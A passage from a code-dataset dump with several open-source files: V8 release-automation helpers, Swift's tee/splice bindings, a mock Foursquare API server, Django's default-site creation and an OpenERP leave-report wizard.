= httplib.HTTPSConnection(\"backend-dot-cluster-fuzz.appspot.com\")\n conn.request(\"POST\", \"/_api/\", params, headers)\n\n response = conn.getresponse()\n data = response.read()\n\n try:\n return json.loads(data)\n except:\n print data\n print \"ERROR: Could not read response. Is your key valid?\"\n raise\n\n def Sleep(self, seconds):\n time.sleep(seconds)\n\n def GetDate(self):\n return datetime.date.today().strftime(\"%Y-%m-%d\")\n\n def GetUTCStamp(self):\n return time.mktime(datetime.datetime.utcnow().timetuple())\n\nDEFAULT_SIDE_EFFECT_HANDLER = SideEffectHandler()\n\n\nclass NoRetryException(Exception):\n pass\n\n\nclass VCInterface(object):\n def InjectStep(self, step):\n self.step=step\n\n def Pull(self):\n raise NotImplementedError()\n\n def Fetch(self):\n raise NotImplementedError()\n\n def GetTags(self):\n raise NotImplementedError()\n\n def GetBranches(self):\n raise NotImplementedError()\n\n def MasterBranch(self):\n raise NotImplementedError()\n\n def CandidateBranch(self):\n raise NotImplementedError()\n\n def RemoteMasterBranch(self):\n raise NotImplementedError()\n\n def RemoteCandidateBranch(self):\n raise NotImplementedError()\n\n def RemoteBranch(self, name):\n raise NotImplementedError()\n\n def CLLand(self):\n raise NotImplementedError()\n\n def Tag(self, tag, remote, message):\n \"\"\"Sets a tag for the current commit.\n\n Assumptions: The commit already landed and the commit message is unique.\n \"\"\"\n raise NotImplementedError()\n\n\nclass GitInterface(VCInterface):\n def Pull(self):\n self.step.GitPull()\n\n def Fetch(self):\n self.step.Git(\"fetch\")\n\n def GetTags(self):\n return self.step.Git(\"tag\").strip().splitlines()\n\n def GetBranches(self):\n # Get relevant remote branches, e.g. \"branch-heads/3.25\".\n branches = filter(\n lambda s: re.match(r\"^branch\\-heads/\\d+\\.\\d+$\", s),\n self.step.GitRemotes())\n # Remove 'branch-heads/' prefix.\n return map(lambda s: s[13:], branches)\n\n def MasterBranch(self):\n return \"master\"\n\n def CandidateBranch(self):\n return \"candidates\"\n\n def RemoteMasterBranch(self):\n return \"origin/master\"\n\n def RemoteCandidateBranch(self):\n return \"origin/candidates\"\n\n def RemoteBranch(self, name):\n # Assume that if someone \"fully qualified\" the ref, they know what they\n # want.\n if name.startswith('refs/'):\n return name\n if name in [\"candidates\", \"master\"]:\n return \"refs/remotes/origin/%s\" % name\n try:\n # Check if branch is in heads.\n if self.step.Git(\"show-ref refs/remotes/origin/%s\" % name).strip():\n return \"refs/remotes/origin/%s\" % name\n except GitFailedException:\n pass\n try:\n # Check if branch is in branch-heads.\n if self.step.Git(\"show-ref refs/remotes/branch-heads/%s\" % name).strip():\n return \"refs/remotes/branch-heads/%s\" % name\n except GitFailedException:\n pass\n self.Die(\"Can't find remote of %s\" % name)\n\n def Tag(self, tag, remote, message):\n # Wait for the commit to appear. Assumes unique commit message titles (this\n # is the case for all automated merge and push commits - also no title is\n # the prefix of another title).\n commit = None\n for wait_interval in [3, 7, 15, 35, 45, 60]:\n self.step.Git(\"fetch\")\n commit = self.step.GitLog(n=1, format=\"%H\", grep=message, branch=remote)\n if commit:\n break\n print(\"The commit has not replicated to git. Waiting for %s seconds.\" %\n wait_interval)\n self.step._side_effect_handler.Sleep(wait_interval)\n else:\n self.step.Die(\"Couldn't determine commit for setting the tag. Maybe the \"\n \"git updater is lagging behind?\")\n\n self.step.Git(\"tag %s %s\" % (tag, commit))\n self.step.Git(\"push origin %s\" % tag)\n\n def CLLand(self):\n self.step.GitCLLand()\n\n\nclass Step(GitRecipesMixin):\n def __init__(self, text, number, config, state, options, handler):\n self._text = text\n self._number = number\n self._config = config\n self._state = state\n self._options = options\n self._side_effect_handler = handler\n self.vc = GitInterface()\n self.vc.InjectStep(self)\n\n # The testing configuration might set a different default cwd.\n self.default_cwd = (self._config.get(\"DEFAULT_CWD\") or\n os.path.join(self._options.work_dir, \"v8\"))\n\n assert self._number >= 0\n assert self._config is not None\n assert self._state is not None\n assert self._side_effect_handler is not None\n\n def __getitem__(self, key):\n # Convenience method to allow direct [] access on step classes for\n # manipulating the backed state dict.\n return self._state.get(key)\n\n def __setitem__(self, key, value):\n # Convenience method to allow direct [] access on step classes for\n # manipulating the backed state dict.\n self._state[key] = value\n\n def Config(self, key):\n return self._config[key]\n\n def Run(self):\n # Restore state.\n state_file = \"%s-state.json\" % self._config[\"PERSISTFILE_BASENAME\"]\n if not self._state and os.path.exists(state_file):\n self._state.update(json.loads(FileToText(state_file)))\n\n print \">>> Step %d: %s\" % (self._number, self._text)\n try:\n return self.RunStep()\n finally:\n # Persist state.\n TextToFile(json.dumps(self._state), state_file)\n\n def RunStep(self): # pragma: no cover\n raise NotImplementedError\n\n def Retry(self, cb, retry_on=None, wait_plan=None):\n \"\"\" Retry a function.\n Params:\n cb: The function to retry.\n retry_on: A callback that takes the result of the function and returns\n True if the function should be retried. A function throwing an\n exception is always retried.\n wait_plan: A list of waiting delays between retries in seconds. The\n maximum number of retries is len(wait_plan).\n \"\"\"\n retry_on = retry_on or (lambda x: False)\n wait_plan = list(wait_plan or [])\n wait_plan.reverse()\n while True:\n got_exception = False\n try:\n result = cb()\n except NoRetryException as e:\n raise e\n except Exception as e:\n got_exception = e\n if got_exception or retry_on(result):\n if not wait_plan: # pragma: no cover\n raise Exception(\"Retried too often. Giving up. Reason: %s\" %\n str(got_exception))\n wait_time = wait_plan.pop()\n print \"Waiting for %f seconds.\" % wait_time\n self._side_effect_handler.Sleep(wait_time)\n print \"Retrying...\"\n else:\n return result\n\n def ReadLine(self, default=None):\n # Don't prompt in forced mode.\n if self._options.force_readline_defaults and default is not None:\n print \"%s (forced)\" % default\n return default\n else:\n return self._side_effect_handler.ReadLine()\n\n def Command(self, name, args, cwd=None):\n cmd = lambda: self._side_effect_handler.Command(\n name, args, \"\", True, cwd=cwd or self.default_cwd)\n return self.Retry(cmd, None, [5])\n\n def Git(self, args=\"\", prefix=\"\", pipe=True, retry_on=None, cwd=None):\n cmd = lambda: self._side_effect_handler.Command(\n \"git\", args, prefix, pipe, cwd=cwd or self.default_cwd)\n result = self.Retry(cmd, retry_on, [5, 30])\n if result is None:\n raise GitFailedException(\"'git %s' failed.\" % args)\n return result\n\n def Editor(self, args):\n if self._options.requires_editor:\n return self._side_effect_handler.Command(\n os.environ[\"EDITOR\"],\n args,\n pipe=False,\n cwd=self.default_cwd)\n\n def ReadURL(self, url, params=None, retry_on=None, wait_plan=None):\n wait_plan = wait_plan or [3, 60, 600]\n cmd = lambda: self._side_effect_handler.ReadURL(url, params)\n return self.Retry(cmd, retry_on, wait_plan)\n\n def GetDate(self):\n return self._side_effect_handler.GetDate()\n\n def Die(self, msg=\"\"):\n if msg != \"\":\n print \"Error: %s\" % msg\n print \"Exiting\"\n raise Exception(msg)\n\n def DieNoManualMode(self, msg=\"\"):\n if not self._options.manual: # pragma: no cover\n msg = msg or \"Only available in manual mode.\"\n self.Die(msg)\n\n def Confirm(self, msg):\n print \"%s [Y/n] \" % msg,\n answer = self.ReadLine(default=\"Y\")\n return answer == \"\" or answer == \"Y\" or answer == \"y\"\n\n def DeleteBranch(self, name, cwd=None):\n for line in self.GitBranch(cwd=cwd).splitlines():\n if re.match(r\"\\*?\\s*%s$\" % re.escape(name), line):\n msg = \"Branch %s exists, do you want to delete it?\" % name\n if self.Confirm(msg):\n self.GitDeleteBranch(name, cwd=cwd)\n print \"Branch %s deleted.\" % name\n else:\n msg = \"Can't continue. Please delete branch %s and try again.\" % name\n self.Die(msg)\n\n def InitialEnvironmentChecks(self, cwd):\n # Cancel if this is not a git checkout.\n if not os.path.exists(os.path.join(cwd, \".git\")): # pragma: no cover\n self.Die(\"This is not a git checkout, this script won't work for you.\")\n\n # Cancel if EDITOR is unset or not executable.\n if (self._options.requires_editor and (not os.environ.get(\"EDITOR\") or\n self.Command(\n \"which\", os.environ[\"EDITOR\"]) is None)): # pragma: no cover\n self.Die(\"Please set your EDITOR environment variable, you'll need it.\")\n\n def CommonPrepare(self):\n # Check for a clean workdir.\n if not self.GitIsWorkdirClean(): # pragma: no cover\n self.Die(\"Workspace is not clean. Please commit or undo your changes.\")\n\n # Checkout master in case the script was left on a work branch.\n self.GitCheckout('origin/master')\n\n # Fetch unfetched revisions.\n self.vc.Fetch()\n\n def PrepareBranch(self):\n # Delete the branch that will be created later if it exists already.\n self.DeleteBranch(self._config[\"BRANCHNAME\"])\n\n def CommonCleanup(self):\n self.GitCheckout('origin/master')\n self.GitDeleteBranch(self._config[\"BRANCHNAME\"])\n\n # Clean up all temporary files.\n for f in glob.iglob(\"%s*\" % self._config[\"PERSISTFILE_BASENAME\"]):\n if os.path.isfile(f):\n os.remove(f)\n if os.path.isdir(f):\n shutil.rmtree(f)\n\n def ReadAndPersistVersion(self, prefix=\"\"):\n def ReadAndPersist(var_name, def_name):\n match = re.match(r\"^#define %s\\s+(\\d*)\" % def_name, line)\n if match:\n value = match.group(1)\n self[\"%s%s\" % (prefix, var_name)] = value\n for line in LinesInFile(os.path.join(self.default_cwd, VERSION_FILE)):\n for (var_name, def_name) in [(\"major\", \"V8_MAJOR_VERSION\"),\n (\"minor\", \"V8_MINOR_VERSION\"),\n (\"build\", \"V8_BUILD_NUMBER\"),\n (\"patch\", \"V8_PATCH_LEVEL\")]:\n ReadAndPersist(var_name, def_name)\n\n def WaitForLGTM(self):\n print (\"Please wait for an LGTM, then type \\\"LGTM\\\" to commit \"\n \"your change. (If you need to iterate on the patch or double check \"\n \"that it's sane, do so in another shell, but remember to not \"\n \"change the headline of the uploaded CL.\")\n answer = \"\"\n while answer != \"LGTM\":\n print \"> \",\n answer = self.ReadLine(None if self._options.wait_for_lgtm else \"LGTM\")\n if answer != \"LGTM\":\n print \"That was not 'LGTM'.\"\n\n def WaitForResolvingConflicts(self, patch_file):\n print(\"Applying the patch \\\"%s\\\" failed. Either type \\\"ABORT\\\", \"\n \"or resolve the conflicts, stage *all* touched files with \"\n \"'git add', and type \\\"RESOLVED\\\"\")\n self.DieNoManualMode()\n answer = \"\"\n while answer != \"RESOLVED\":\n if answer == \"ABORT\":\n self.Die(\"Applying the patch failed.\")\n if answer != \"\":\n print \"That was not 'RESOLVED' or 'ABORT'.\"\n print \"> \",\n answer = self.ReadLine()\n\n # Takes a file containing the patch to apply as first argument.\n def ApplyPatch(self, patch_file, revert=False):\n try:\n self.GitApplyPatch(patch_file, revert)\n except GitFailedException:\n self.WaitForResolvingConflicts(patch_file)\n\n def GetVersionTag(self, revision):\n tag = self.Git(\"describe --tags %s\" % revision).strip()\n if VERSION_RE.match(tag):\n return tag\n else:\n return None\n\n def GetRecentReleases(self, max_age):\n # Make sure tags are fetched.\n self.Git(\"fetch origin +refs/tags/*:refs/tags/*\")\n\n # Current timestamp.\n time_now = int(self._side_effect_handler.GetUTCStamp())\n\n # List every tag from a given period.\n revisions = self.Git(\"rev-list --max-age=%d --tags\" %\n int(time_now - max_age)).strip()\n\n # Filter out revisions who's tag is off by one or more commits.\n return filter(lambda r: self.GetVersionTag(r), revisions.splitlines())\n\n def GetLatestVersion(self):\n # Use cached version if available.\n if self[\"latest_version\"]:\n return self[\"latest_version\"]\n\n # Make sure tags are fetched.\n self.Git(\"fetch origin +refs/tags/*:refs/tags/*\")\n version = sorted(filter(VERSION_RE.match, self.vc.GetTags()),\n key=SortingKey, reverse=True)[0]\n self[\"latest_version\"] = version\n return version\n\n def GetLatestRelease(self):\n \"\"\"The latest release is the git hash of the latest tagged version.\n\n This revision should be rolled into chromium.\n \"\"\"\n latest_version = self.GetLatestVersion()\n\n # The latest release.\n latest_hash = self.GitLog(n=1, format=\"%H\", branch=latest_version)\n assert latest_hash\n return latest_hash\n\n def GetLatestReleaseBase(self, version=None):\n \"\"\"The latest release base is the latest revision that is covered in the\n last change log file. It doesn't include cherry-picked patches.\n \"\"\"\n latest_version = version or self.GetLatestVersion()\n\n # Strip patch level if it exists.\n latest_version = \".\".join(latest_version.split(\".\")[:3])\n\n # The latest release base.\n latest_hash = self.GitLog(n=1, format=\"%H\", branch=latest_version)\n assert latest_hash\n\n title = self.GitLog(n=1, format=\"%s\", git_hash=latest_hash)\n match = PUSH_MSG_GIT_RE.match(title)\n if match:\n # Legacy: In the old process there's one level of indirection. The\n # version is on the candidates branch and points to the real release\n # base on master through the commit message.\n return match.group(\"git_rev\")\n match = PUSH_MSG_NEW_RE.match(title)\n if match:\n # This is a new-style v8 version branched from master. The commit\n # \"latest_hash\" is the version-file change. Its parent is the release\n # base on master.\n return self.GitLog(n=1, format=\"%H\", git_hash=\"%s^\" % latest_hash)\n\n self.Die(\"Unknown latest release: %s\" % latest_hash)\n\n def ArrayToVersion(self, prefix):\n return \".\".join([self[prefix + \"major\"],\n self[prefix + \"minor\"],\n self[prefix + \"build\"],\n self[prefix + \"patch\"]])\n\n def StoreVersion(self, version, prefix):\n version_parts = version.split(\".\")\n if len(version_parts) == 3:\n version_parts.append(\"0\")\n major, minor, build, patch = version_parts\n self[prefix + \"major\"] = major\n self[prefix + \"minor\"] = minor\n self[prefix + \"build\"] = build\n self[prefix + \"patch\"] = patch\n\n def SetVersion(self, version_file, prefix):\n output = \"\"\n for line in FileToText(version_file).splitlines():\n if line.startswith(\"#define V8_MAJOR_VERSION\"):\n line = re.sub(\"\\d+$\", self[prefix + \"major\"], line)\n elif line.startswith(\"#define V8_MINOR_VERSION\"):\n line = re.sub(\"\\d+$\", self[prefix + \"minor\"], line)\n elif line.startswith(\"#define V8_BUILD_NUMBER\"):\n line = re.sub(\"\\d+$\", self[prefix + \"build\"], line)\n elif line.startswith(\"#define V8_PATCH_LEVEL\"):\n line = re.sub(\"\\d+$\", self[prefix + \"patch\"], line)\n elif (self[prefix + \"candidate\"] and\n line.startswith(\"#define V8_IS_CANDIDATE_VERSION\")):\n line = re.sub(\"\\d+$\", self[prefix + \"candidate\"], line)\n output += \"%s\\n\" % line\n TextToFile(output, version_file)\n\n\nclass BootstrapStep(Step):\n MESSAGE = \"Bootstapping v8 checkout.\"\n\n def RunStep(self):\n if os.path.realpath(self.default_cwd) == os.path.realpath(V8_BASE):\n self.Die(\"Can't use v8 checkout with calling script as work checkout.\")\n # Directory containing the working v8 checkout.\n if not os.path.exists(self._options.work_dir):\n os.makedirs(self._options.work_dir)\n if not os.path.exists(self.default_cwd):\n self.Command(\"fetch\", \"v8\", cwd=self._options.work_dir)\n\n\nclass UploadStep(Step):\n MESSAGE = \"Upload for code review.\"\n\n def RunStep(self):\n if self._options.reviewer:\n print \"Using account %s for review.\" % self._options.reviewer\n reviewer = self._options.reviewer\n else:\n print \"Please enter the email address of a V8 reviewer for your patch: \",\n self.DieNoManualMode(\"A reviewer must be specified in forced mode.\")\n reviewer = self.ReadLine()\n self.GitUpload(reviewer, self._options.author, self._options.force_upload,\n bypass_hooks=self._options.bypass_upload_hooks,\n cc=self._options.cc)\n\n\nclass DetermineV8Sheriff(Step):\n MESSAGE = \"Determine the V8 sheriff for code review.\"\n\n def RunStep(self):\n self[\"sheriff\"] = None\n if not self._options.sheriff: # pragma: no cover\n return\n\n # The sheriff determined by the rotation on the waterfall has a\n # @google.com account.\n url = \"https://chromium-build.appspot.com/p/chromium/sheriff_v8.js\"\n match = re.match(r\"document\\.write\\('(\\w+)'\\)\", self.ReadURL(url))\n\n # If \"channel is sheriff\", we can't match an account.\n if match:\n g_name = match.group(1)\n # Optimistically assume that google and chromium account name are the\n # same.\n self[\"sheriff\"] = g_name + \"@chromium.org\"\n self._options.reviewer = (\"%s,%s\" %\n (self[\"sheriff\"], self._options.reviewer))\n print \"Found active sheriff: %s\" % self[\"sheriff\"]\n else:\n print \"No active sheriff found.\"\n\n\ndef MakeStep(step_class=Step, number=0, state=None, config=None,\n options=None, side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER):\n # Allow to pass in empty dictionaries.\n state = state if state is not None else {}\n config = config if config is not None else {}\n\n try:\n message = step_class.MESSAGE\n except AttributeError:\n message = step_class.__name__\n\n return step_class(message, number=number, config=config,\n state=state, options=options,\n handler=side_effect_handler)\n\n\nclass ScriptsBase(object):\n def __init__(self,\n config=None,\n side_effect_handler=DEFAULT_SIDE_EFFECT_HANDLER,\n state=None):\n self._config = config or self._Config()\n self._side_effect_handler = side_effect_handler\n self._state = state if state is not None else {}\n\n def _Description(self):\n return None\n\n def _PrepareOptions(self, parser):\n pass\n\n def _ProcessOptions(self, options):\n return True\n\n def _Steps(self): # pragma: no cover\n raise Exception(\"Not implemented.\")\n\n def _Config(self):\n return {}\n\n def MakeOptions(self, args=None):\n parser = argparse.ArgumentParser(description=self._Description())\n parser.add_argument(\"-a\", \"--author\", default=\"\",\n help=\"The author email used for rietveld.\")\n parser.add_argument(\"--dry-run\", default=False, action=\"store_true\",\n help=\"Perform only read-only actions.\")\n parser.add_argument(\"-r\", \"--reviewer\", default=\"\",\n help=\"The account name to be used for reviews.\")\n parser.add_argument(\"--sheriff\", default=False, action=\"store_true\",\n help=(\"Determine current sheriff to review CLs. On \"\n \"success, this will overwrite the reviewer \"\n \"option.\"))\n parser.add_argument(\"-s\", \"--step\",\n help=\"Specify the step where to start work. Default: 0.\",\n default=0, type=int)\n parser.add_argument(\"--work-dir\",\n help=(\"Location where to bootstrap a working v8 \"\n \"checkout.\"))\n self._PrepareOptions(parser)\n\n if args is None: # pragma: no cover\n options = parser.parse_args()\n else:\n options = parser.parse_args(args)\n\n # Process common options.\n if options.step < 0: # pragma: no cover\n print \"Bad step number %d\" % options.step\n parser.print_help()\n return None\n\n # Defaults for options, common to all scripts.\n options.manual = getattr(options, \"manual\", True)\n options.force = getattr(options, \"force\", False)\n options.bypass_upload_hooks = False\n\n # Derived options.\n options.requires_editor = not options.force\n options.wait_for_lgtm = not options.force\n options.force_readline_defaults = not options.manual\n options.force_upload = not options.manual\n\n # Process script specific options.\n if not self._ProcessOptions(options):\n parser.print_help()\n return None\n\n if not options.work_dir:\n options.work_dir = \"/tmp/v8-release-scripts-work-dir\"\n return options\n\n def RunSteps(self, step_classes, args=None):\n options = self.MakeOptions(args)\n if not options:\n return 1\n\n state_file = \"%s-state.json\" % self._config[\"PERSISTFILE_BASENAME\"]\n if options.step == 0 and os.path.exists(state_file):\n os.remove(state_file)\n\n steps = []\n for (number, step_class) in enumerate([BootstrapStep] + step_classes):\n steps.append(MakeStep(step_class, number, self._state, self._config,\n options, self._side_effect_handler))\n for step in steps[options.step:]:\n if step.Run():\n return 0\n return 0\n\n def Run(self, args=None):\n return self.RunSteps(self._Steps(), args)\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2453,"cells":{"repo_name":{"kind":"string","value":"daasbank/swift"},"path":{"kind":"string","value":"swift/common/splice.py"},"copies":{"kind":"string","value":"36"},"size":{"kind":"string","value":"5500"},"content":{"kind":"string","value":"# Copyright (c) 2014 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n'''\nBindings to the `tee` and `splice` system calls\n'''\n\nimport os\nimport operator\nimport six\nimport ctypes\nimport ctypes.util\n\n__all__ = ['tee', 'splice']\n\n\nc_loff_t = ctypes.c_long\n\n# python 2.6 doesn't have c_ssize_t\nc_ssize_t = getattr(ctypes, 'c_ssize_t', ctypes.c_long)\n\n\nclass Tee(object):\n '''Binding to `tee`'''\n\n __slots__ = '_c_tee',\n\n def __init__(self):\n libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)\n\n try:\n c_tee = libc.tee\n except AttributeError:\n self._c_tee = None\n return\n\n c_tee.argtypes = [\n ctypes.c_int,\n ctypes.c_int,\n ctypes.c_size_t,\n ctypes.c_uint\n ]\n\n c_tee.restype = c_ssize_t\n\n def errcheck(result, func, arguments):\n if result == -1:\n errno = ctypes.set_errno(0)\n\n raise IOError(errno, 'tee: %s' % os.strerror(errno))\n else:\n return result\n\n c_tee.errcheck = errcheck\n\n self._c_tee = c_tee\n\n def __call__(self, fd_in, fd_out, len_, flags):\n '''See `man 2 tee`\n\n File-descriptors can be file-like objects with a `fileno` method, or\n integers.\n\n Flags can be an integer value, or a list of flags (exposed on\n `splice`).\n\n This function returns the number of bytes transferred (i.e. the actual\n result of the call to `tee`).\n\n Upon other errors, an `IOError` is raised with the proper `errno` set.\n '''\n\n if not self.available:\n raise EnvironmentError('tee not available')\n\n if not isinstance(flags, six.integer_types):\n c_flags = six.moves.reduce(operator.or_, flags, 0)\n else:\n c_flags = flags\n\n c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)()\n c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)()\n\n return self._c_tee(c_fd_in, c_fd_out, len_, c_flags)\n\n @property\n def available(self):\n '''Availability of `tee`'''\n\n return self._c_tee is not None\n\ntee = Tee()\ndel Tee\n\n\nclass Splice(object):\n '''Binding to `splice`'''\n\n # From `bits/fcntl-linux.h`\n SPLICE_F_MOVE = 1\n SPLICE_F_NONBLOCK = 2\n SPLICE_F_MORE = 4\n SPLICE_F_GIFT = 8\n\n __slots__ = '_c_splice',\n\n def __init__(self):\n libc = ctypes.CDLL(ctypes.util.find_library('c'), use_errno=True)\n\n try:\n c_splice = libc.splice\n except AttributeError:\n self._c_splice = None\n return\n\n c_loff_t_p = ctypes.POINTER(c_loff_t)\n\n c_splice.argtypes = [\n ctypes.c_int, c_loff_t_p,\n ctypes.c_int, c_loff_t_p,\n ctypes.c_size_t,\n ctypes.c_uint\n ]\n\n c_splice.restype = c_ssize_t\n\n def errcheck(result, func, arguments):\n if result == -1:\n errno = ctypes.set_errno(0)\n\n raise IOError(errno, 'splice: %s' % os.strerror(errno))\n else:\n off_in = arguments[1]\n off_out = arguments[3]\n\n return (\n result,\n off_in.contents.value if off_in is not None else None,\n off_out.contents.value if off_out is not None else None)\n\n c_splice.errcheck = errcheck\n\n self._c_splice = c_splice\n\n def __call__(self, fd_in, off_in, fd_out, off_out, len_, flags):\n '''See `man 2 splice`\n\n File-descriptors can be file-like objects with a `fileno` method, or\n integers.\n\n Flags can be an integer value, or a list of flags (exposed on this\n object).\n\n Returns a tuple of the result of the `splice` call, the output value of\n `off_in` and the output value of `off_out` (or `None` for any of these\n output values, if applicable).\n\n Upon other errors, an `IOError` is raised with the proper `errno` set.\n\n Note: if you want to pass `NULL` as value for `off_in` or `off_out` to\n the system call, you must pass `None`, *not* 0!\n '''\n\n if not self.available:\n raise EnvironmentError('splice not available')\n\n if not isinstance(flags, six.integer_types):\n c_flags = six.moves.reduce(operator.or_, flags, 0)\n else:\n c_flags = flags\n\n c_fd_in = getattr(fd_in, 'fileno', lambda: fd_in)()\n c_fd_out = getattr(fd_out, 'fileno', lambda: fd_out)()\n\n c_off_in = \\\n ctypes.pointer(c_loff_t(off_in)) if off_in is not None else None\n c_off_out = \\\n ctypes.pointer(c_loff_t(off_out)) if off_out is not None else None\n\n return self._c_splice(\n c_fd_in, c_off_in, c_fd_out, c_off_out, len_, c_flags)\n\n @property\n def available(self):\n '''Availability of `splice`'''\n\n return self._c_splice is not None\n\nsplice = Splice()\ndel Splice\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2454,"cells":{"repo_name":{"kind":"string","value":"omondiy/foursquared.eclair"},"path":{"kind":"string","value":"mock_server/playfoursquare.py"},"copies":{"kind":"string","value":"127"},"size":{"kind":"string","value":"1999"},"content":{"kind":"string","value":"#!/usr/bin/python2.6\n#\n# Simple http server to emulate api.playfoursquare.com\n\nimport logging\nimport shutil\nimport urlparse\n\nimport SimpleHTTPServer\nimport BaseHTTPServer\n\n\nclass RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n \"\"\"Handle playfoursquare.com requests, for testing.\"\"\"\n\n def do_GET(self):\n logging.warn('do_GET: %s, %s', self.command, self.path)\n\n url = urlparse.urlparse(self.path)\n logging.warn('do_GET: %s', url)\n query = urlparse.parse_qs(url.query)\n query_keys = [pair[0] for pair in query]\n\n response = self.handle_url(url)\n if response != None:\n self.send_200()\n shutil.copyfileobj(response, self.wfile)\n self.wfile.close()\n\n do_POST = do_GET\n\n def handle_url(self, url):\n path = None\n\n if url.path == '/v1/venue':\n path = '../captures/api/v1/venue.xml'\n elif url.path == '/v1/venues':\n path = '../captures/api/v1/venues.xml'\n elif url.path == '/v1/user':\n path = '../captures/api/v1/user.xml'\n elif url.path == '/v1/checkcity':\n path = '../captures/api/v1/checkcity.xml'\n elif url.path == '/v1/checkins':\n path = '../captures/api/v1/checkins.xml'\n elif url.path == '/v1/cities':\n path = '../captures/api/v1/cities.xml'\n elif url.path == '/v1/switchcity':\n path = '../captures/api/v1/switchcity.xml'\n elif url.path == '/v1/tips':\n path = '../captures/api/v1/tips.xml'\n elif url.path == '/v1/checkin':\n path = '../captures/api/v1/checkin.xml'\n\n if path is None:\n self.send_error(404)\n else:\n logging.warn('Using: %s' % path)\n return open(path)\n\n def send_200(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/xml')\n self.end_headers()\n\n\ndef main():\n server_address = ('0.0.0.0', 8080)\n httpd = BaseHTTPServer.HTTPServer(server_address, RequestHandler)\n\n sa = httpd.socket.getsockname()\n print \"Serving HTTP on\", sa[0], \"port\", sa[1], \"...\"\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n main()\n"},"license":{"kind":"string","value":"apache-2.0"}}},{"rowIdx":2455,"cells":{"repo_name":{"kind":"string","value":"IV-GII/SocialCookies"},"path":{"kind":"string","value":"ENV1/lib/python2.7/site-packages/django/contrib/sites/management.py"},"copies":{"kind":"string","value":"232"},"size":{"kind":"string","value":"1587"},"content":{"kind":"string","value":"\"\"\"\nCreates the default Site object.\n\"\"\"\n\nfrom django.db.models import signals\nfrom django.db import connections\nfrom django.db import router\nfrom django.contrib.sites.models import Site\nfrom django.contrib.sites import models as site_app\nfrom django.core.management.color import no_style\n\ndef create_default_site(app, created_models, verbosity, db, **kwargs):\n # Only create the default sites in databases where Django created the table\n if Site in created_models and router.allow_syncdb(db, Site) :\n # The default settings set SITE_ID = 1, and some tests in Django's test\n # suite rely on this value. However, if database sequences are reused\n # (e.g. in the test suite after flush/syncdb), it isn't guaranteed that\n # the next id will be 1, so we coerce it. See #15573 and #16353. This\n # can also crop up outside of tests - see #15346.\n if verbosity >= 2:\n print(\"Creating example.com Site object\")\n Site(pk=1, domain=\"example.com\", name=\"example.com\").save(using=db)\n\n # We set an explicit pk instead of relying on auto-incrementation,\n # so we need to reset the database sequence. See #17415.\n sequence_sql = connections[db].ops.sequence_reset_sql(no_style(), [Site])\n if sequence_sql:\n if verbosity >= 2:\n print(\"Resetting sequence\")\n cursor = connections[db].cursor()\n for command in sequence_sql:\n cursor.execute(command)\n\n Site.objects.clear_cache()\n\nsignals.post_syncdb.connect(create_default_site, sender=site_app)\n"},"license":{"kind":"string","value":"gpl-2.0"}}},{"rowIdx":2456,"cells":{"repo_name":{"kind":"string","value":"jaggu303619/asylum"},"path":{"kind":"string","value":"openerp/addons/hr_holidays/wizard/hr_holidays_summary_employees.py"},"copies":{"kind":"string","value":"52"},"size":{"kind":"string","value":"2187"},"content":{"kind":"string","value":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\nimport time\n\nfrom openerp.osv import fields, osv\n\nclass hr_holidays_summary_employee(osv.osv_memory):\n _name = 'hr.holidays.summary.employee'\n _description = 'HR Leaves Summary Report By Employee'\n _columns = {\n 'date_from': fields.date('From', required=True),\n 'emp': fields.many2many('hr.employee', 'summary_emp_rel', 'sum_id', 'emp_id', 'Employee(s)'),\n 'holiday_type': fields.selection([('Approved','Approved'),('Confirmed','Confirmed'),('both','Both Approved and Confirmed')], 'Select Leave Type', required=True)\n }\n\n _defaults = {\n 'date_from': lambda *a: time.strftime('%Y-%m-01'),\n 'holiday_type': 'Approved',\n }\n\n def print_report(self, cr, uid, ids, context=None):\n data = self.read(cr, uid, ids, [], context=context)[0]\n data['emp'] = context['active_ids']\n datas = {\n 'ids': [],\n 'model': 'hr.employee',\n 'form': data\n }\n return {\n 'type': 'ir.actions.report.xml',\n 'report_name': 'holidays.summary',\n 'datas': datas,\n }\n\nhr_holidays_summary_employee()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n"},"license":{"kind":"string","value":"agpl-3.0"}}},{"rowIdx":2457,"cells":{"repo_name":{"kind":"string","value":"rsharris/jun2015lgl"},"path":{"kind":"string","value":"create_script_insert_length_sparse.py"},"copies":{"kind":"string","value":"1"},"size":{"kind":"string","value":"17318"},"content":{"kind":"string","value":"#!/usr/bin/env python\n\"\"\"\nCreate a cluster job file to create an average insert length sparsity\ndiscriminator track.\n\"\"\"\n\nfrom sys import argv,stdin,stdout,stderr,exit\n\n\ndef usage(s=None):\n\tmessage = \"\"\"\n\nusage: create_script_insert_length_sparse [options] > insert_length_sparse.sh\n __ (required) run descriptor; for example, CS_NORM_PE\n means subject \"CS\", sample \"NORM\", and type \"PE\";\n other filenames can use \"{run}\" to refer to 